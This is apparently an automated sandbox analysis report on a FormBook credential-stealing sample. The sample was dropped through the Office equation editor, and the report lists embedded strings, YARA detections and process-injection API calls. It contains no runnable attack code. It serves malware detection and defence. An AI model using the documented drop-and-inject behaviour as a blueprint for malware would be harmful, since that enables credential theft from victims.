      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
      Source: vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exeJump to dropped file
      Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and writeJump to behavior
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B EnumWindows,NtSetInformationThread,4_2_0031044B
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003154F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA,4_2_003154F4
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315A6C NtProtectVirtualMemory,4_2_00315A6C
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003106B1 NtSetInformationThread,CloseServiceHandle,TerminateProcess,CreateFileA,4_2_003106B1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315336 NtSetInformationThread,LoadLibraryA,4_2_00315336
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031232A NtWriteVirtualMemory,4_2_0031232A
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315F9F NtResumeThread,4_2_00315F9F
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031078C CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,4_2_0031078C
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315435 NtWriteVirtualMemory,4_2_00315435
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316039 NtResumeThread,4_2_00316039
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316015 NtResumeThread,4_2_00316015
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312455 NtWriteVirtualMemory,4_2_00312455
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003104B2 NtSetInformationThread,4_2_003104B2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003124BD NtWriteVirtualMemory,4_2_003124BD
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316089 NtResumeThread,4_2_00316089
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003160D1 NtResumeThread,4_2_003160D1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003104CD NtSetInformationThread,4_2_003104CD
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312531 NtWriteVirtualMemory,4_2_00312531
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310537 NtSetInformationThread,4_2_00310537
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310516 NtSetInformationThread,4_2_00310516
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316106 NtResumeThread,4_2_00316106
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031059D NtSetInformationThread,4_2_0031059D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003161ED NtResumeThread,4_2_003161ED
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003105D9 NtSetInformationThread,4_2_003105D9
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316239 NtResumeThread,4_2_00316239
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031260D NtWriteVirtualMemory,4_2_0031260D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003162C5 NtResumeThread,4_2_003162C5
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316325 NtResumeThread,4_2_00316325
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312705 NtWriteVirtualMemory,4_2_00312705
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310F7D NtWriteVirtualMemory,4_2_00310F7D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031276A NtWriteVirtualMemory,4_2_0031276A
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315FE5 NtResumeThread,4_2_00315FE5
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003147EF NtSetInformationThread,4_2_003147EF
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003123D5 NtWriteVirtualMemory,4_2_003123D5
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315FC1 NtResumeThread,4_2_00315FC1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031044B EnumWindows,NtSetInformationThread,4_2_0031044B
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003154F4 NtSetInformationThread,NtWriteVirtualMemory,LoadLibraryA,4_2_003154F4
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315A6C NtProtectVirtualMemory,4_2_00315A6C
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003106B1 NtSetInformationThread,CloseServiceHandle,TerminateProcess,CreateFileA,4_2_003106B1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315336 NtSetInformationThread,LoadLibraryA,4_2_00315336
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031232A NtWriteVirtualMemory,4_2_0031232A
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315F9F NtResumeThread,4_2_00315F9F
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031078C CloseServiceHandle,NtWriteVirtualMemory,TerminateProcess,4_2_0031078C
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315435 NtWriteVirtualMemory,4_2_00315435
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316039 NtResumeThread,4_2_00316039
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316015 NtResumeThread,4_2_00316015
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312455 NtWriteVirtualMemory,4_2_00312455
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003104B2 NtSetInformationThread,4_2_003104B2
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003124BD NtWriteVirtualMemory,4_2_003124BD
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316089 NtResumeThread,4_2_00316089
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003160D1 NtResumeThread,4_2_003160D1
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003104CD NtSetInformationThread,4_2_003104CD
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312531 NtWriteVirtualMemory,4_2_00312531
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310537 NtSetInformationThread,4_2_00310537
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310516 NtSetInformationThread,4_2_00310516
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316106 NtResumeThread,4_2_00316106
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031059D NtSetInformationThread,4_2_0031059D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003161ED NtResumeThread,4_2_003161ED
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003105D9 NtSetInformationThread,4_2_003105D9
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316239 NtResumeThread,4_2_00316239
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031260D NtWriteVirtualMemory,4_2_0031260D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003162C5 NtResumeThread,4_2_003162C5
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00316325 NtResumeThread,4_2_00316325
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00312705 NtWriteVirtualMemory,4_2_00312705
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00310F7D NtWriteVirtualMemory,4_2_00310F7D
      Source: C:\Users\Public\vbc.exeCode function: 4_2_0031276A NtWriteVirtualMemory,4_2_0031276A
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315FE5 NtResumeThread,4_2_00315FE5
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003147EF NtSetInformationThread,4_2_003147EF
      Source: C:\Users\Public\vbc.exeCode function: 4_2_003123D5 NtWriteVirtualMemory,4_2_003123D5
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00315FC1 NtResumeThread,4_2_00315FC1
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_1E98FEA0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_1E98FED0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FFB4 NtCreateSection,LdrInitializeThunk,5_2_1E98FFB4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_1E98FC90
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_1E98FC60
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FD8C NtDelayExecution,LdrInitializeThunk,5_2_1E98FD8C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_1E98FDC0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_1E98FAD0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_1E98FAE8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_1E98FBB8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_1E98FB68
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F900 NtReadFile,LdrInitializeThunk,5_2_1E98F900
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9900C4 NtCreateFile,LdrInitializeThunk,5_2_1E9900C4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_1E990048
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990078 NtResumeThread,LdrInitializeThunk,5_2_1E990078
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FE24 NtWriteVirtualMemory,5_2_1E98FE24
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FFFC NtCreateProcessEx,5_2_1E98FFFC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FF34 NtQueueApcThread,5_2_1E98FF34
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC30 NtOpenProcess,5_2_1E98FC30
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FC48 NtSetInformationFile,5_2_1E98FC48
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990C40 NtGetContextThread,5_2_1E990C40
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E991D80 NtSuspendThread,5_2_1E991D80
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FD5C NtEnumerateKey,5_2_1E98FD5C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FAB8 NtQueryValueKey,5_2_1E98FAB8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FA20 NtQueryInformationFile,5_2_1E98FA20
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FA50 NtEnumerateValueKey,5_2_1E98FA50
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FBE8 NtQueryVirtualMemory,5_2_1E98FBE8
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98FB50 NtCreateKey,5_2_1E98FB50
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F8CC NtWaitForSingleObject,5_2_1E98F8CC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F9F0 NtClose,5_2_1E98F9F0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E98F938 NtWriteFile,5_2_1E98F938
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E991930 NtSetContextThread,5_2_1E991930
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9907AC NtCreateMutant,5_2_1E9907AC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9910D0 NtOpenProcessToken,5_2_1E9910D0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E990060 NtQuerySection,5_2_1E990060
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9901D4 NtSetValueKey,5_2_1E9901D4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99010C NtOpenDirectoryObject,5_2_1E99010C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E991148 NtOpenThread,5_2_1E991148
      Source: C:\Users\Public\vbc.exeCode function: 5_2_001B5A6C NtProtectVirtualMemory,5_2_001B5A6C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B00C4 NtCreateFile,LdrInitializeThunk,9_2_020B00C4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B07AC NtCreateMutant,LdrInitializeThunk,9_2_020B07AC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_020AFAD0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_020AFAE8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_020AFB68
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF900 NtReadFile,LdrInitializeThunk,9_2_020AF900
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF9F0 NtClose,LdrInitializeThunk,9_2_020AF9F0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_020AFED0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_020AFDC0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0048 NtProtectVirtualMemory,9_2_020B0048
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0060 NtQuerySection,9_2_020B0060
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0078 NtResumeThread,9_2_020B0078
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B10D0 NtOpenProcessToken,9_2_020B10D0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B010C NtOpenDirectoryObject,9_2_020B010C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B1148 NtOpenThread,9_2_020B1148
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B01D4 NtSetValueKey,9_2_020B01D4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFA20 NtQueryInformationFile,9_2_020AFA20
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFA50 NtEnumerateValueKey,9_2_020AFA50
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFAB8 NtQueryValueKey,9_2_020AFAB8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFB50 NtCreateKey,9_2_020AFB50
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFBB8 NtQueryInformationToken,9_2_020AFBB8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFBE8 NtQueryVirtualMemory,9_2_020AFBE8
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF8CC NtWaitForSingleObject,9_2_020AF8CC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AF938 NtWriteFile,9_2_020AF938
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B1930 NtSetContextThread,9_2_020B1930
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFE24 NtWriteVirtualMemory,9_2_020AFE24
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFEA0 NtReadVirtualMemory,9_2_020AFEA0
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFF34 NtQueueApcThread,9_2_020AFF34
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFFB4 NtCreateSection,9_2_020AFFB4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFFFC NtCreateProcessEx,9_2_020AFFFC
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC30 NtOpenProcess,9_2_020AFC30
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC48 NtSetInformationFile,9_2_020AFC48
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B0C40 NtGetContextThread,9_2_020B0C40
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC60 NtMapViewOfSection,9_2_020AFC60
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFC90 NtUnmapViewOfSection,9_2_020AFC90
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFD5C NtEnumerateKey,9_2_020AFD5C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020AFD8C NtDelayExecution,9_2_020AFD8C
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020B1D80 NtSuspendThread,9_2_020B1D80
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099D50 NtCreateFile,9_2_00099D50
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099E00 NtReadFile,9_2_00099E00
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099E80 NtClose,9_2_00099E80
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099F30 NtAllocateVirtualMemory,9_2_00099F30
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099D4B NtCreateFile,9_2_00099D4B
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099DA4 NtCreateFile,9_2_00099DA4
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099DFE NtReadFile,9_2_00099DFE
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099E7A NtClose,9_2_00099E7A
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_00099F2B NtAllocateVirtualMemory,9_2_00099F2B
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004038584_2_00403858
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004012184_2_00401218
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403C2E4_2_00403C2E
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403A594_2_00403A59
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403AEE4_2_00403AEE
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403A874_2_00403A87
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403B494_2_00403B49
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403B134_2_00403B13
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004038584_2_00403858
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004012184_2_00401218
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403C2E4_2_00403C2E
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403A594_2_00403A59
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403AEE4_2_00403AEE
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403A874_2_00403A87
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403B494_2_00403B49
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00403B134_2_00403B13
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9BEE4C5_2_1E9BEE4C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9B0F3F5_2_1E9B0F3F
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA3FDDD5_2_1EA3FDDD
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9D0D3B5_2_1E9D0D3B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9ACD5B5_2_1E9ACD5B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA53A835_2_1EA53A83
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA4CBA45_2_1EA4CBA4
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99FBD75_2_1E99FBD7
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA2DBDA5_2_1EA2DBDA
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9C7B005_2_1E9C7B00
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA3F8EE5_2_1EA3F8EE
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9AC85C5_2_1E9AC85C
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9C286D5_2_1E9C286D
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A29B25_2_1E9A29B2
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA4098E5_2_1EA4098E
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9B69FE5_2_1E9B69FE
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA259555_2_1EA25955
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A46805_2_1E9A4680
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9AE6C15_2_1E9AE6C1
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA426225_2_1EA42622
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9AC7BC5_2_1E9AC7BC
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA2579A5_2_1EA2579A
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9B14895_2_1E9B1489
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9D54855_2_1E9D5485
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9BC5F05_2_1E9BC5F0
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A351F5_2_1E9A351F
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99E2E95_2_1E99E2E9
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1EA412385_2_1EA41238
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9C63DB5_2_1E9C63DB
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99F3CF5_2_1E99F3CF
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A23055_2_1E9A2305
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A73535_2_1E9A7353
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9EA37B5_2_1E9EA37B
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E99E0C65_2_1E99E0C6
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9B905A5_2_1E9B905A
      Source: C:\Users\Public\vbc.exeCode function: 5_2_1E9A30405_2_1E9A3040
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_021612389_2_02161238
      Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 9_2_020BE2E99_2_020BE2E9
